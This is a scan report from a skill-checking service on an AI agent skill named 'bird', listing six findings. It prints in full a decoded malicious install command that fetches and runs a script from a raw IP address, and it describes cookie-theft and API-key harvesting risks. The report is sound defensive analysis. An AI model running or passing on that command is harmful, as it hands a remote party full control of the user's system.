Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 6 findings: 2 critical, 2 high, 2 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Hidden command injection via base64-encoded script from untrusted IP, Potential data exfiltration through browser cookie access.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 26/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings6
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-xn/SKILL.md:10 | |
| CRITICAL | Hidden command injection via base64-encoded script from untrusted IP The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This command downloads and executes an arbitrary script from a suspicious, unverified IP address (`91.92.242.30`) directly into the user's shell. This allows for arbitrary code execution, making the system vulnerable to complete compromise. This is a severe supply chain risk and a hidden instruction due to the encoding. Remove the malicious installation command. Provide a clear, verifiable, and secure installation method, preferably from official package managers or trusted sources with cryptographic verification. Avoid direct execution of scripts from unknown URLs. | LLM | SKILL.md:15 | |
| HIGH | Potential data exfiltration through browser cookie access The skill description states that the `bird` tool can authenticate using "Browser cookies (default: Firefox/Chrome)". This implies the tool has the capability to access and potentially exfiltrate sensitive session cookies from the user's web browsers. If the `bird` binary is malicious or compromised (which is a risk given the installation method), this feature could be exploited to steal user session tokens for X/Twitter and other sites, leading to account compromise. Clarify how browser cookies are accessed and secured. If possible, use official APIs or secure authentication flows (e.g., OAuth) instead of direct cookie access. Implement strict sandboxing or permissions to limit cookie access only when absolutely necessary and with explicit user consent. | LLM | SKILL.md:36 | |
| HIGH | Dependency on unverified third-party Homebrew tap The manifest specifies installation via Homebrew using a third-party tap: `steipete/tap/bird`. Relying on external, unverified taps introduces a supply chain risk, as the maintainer of the tap could introduce malicious code into the `bird` package, which would then be installed on the user's system. Recommend using official package repositories or verified, signed packages. If a third-party tap is necessary, advise users to thoroughly review the tap's source code and maintainer reputation. | LLM | SKILL.md:2 | |
| MEDIUM | Potential credential harvesting of Sweetistics API key The skill mentions using `SWEETISTICS_API_KEY` for authentication. If the `bird` tool is compromised or designed maliciously, it could capture and exfiltrate this API key, granting unauthorized access to the Sweetistics service. Advise users to use environment variables or secure credential storage mechanisms. Ensure the tool handles API keys securely, avoiding logging or transmitting them unnecessarily. | LLM | SKILL.md:37 | |
| MEDIUM | Suspicious password-protected ZIP for Windows installation The Windows installation instructs users to download a password-protected ZIP file (`OpenClawProvider-1.0.2.zip`) from GitHub releases and extract it using the password `openclaw`. While GitHub releases are generally trusted, using a password-protected archive with a publicly disclosed password can be a tactic to bypass some security scans or to obscure the contents, making it harder for users to inspect before execution. This introduces a minor supply chain risk and raises suspicion about the contents. Avoid using password-protected archives with publicly disclosed passwords for software distribution. Provide clear instructions for verifying the integrity of downloaded files (e.g., checksums). Ensure the contents of the ZIP are transparent and safe. | LLM | SKILL.md:11 |
Scan History
Embed Code
[](https://skillshield.io/report/50314219d2dfb1ba)
Powered by SkillShield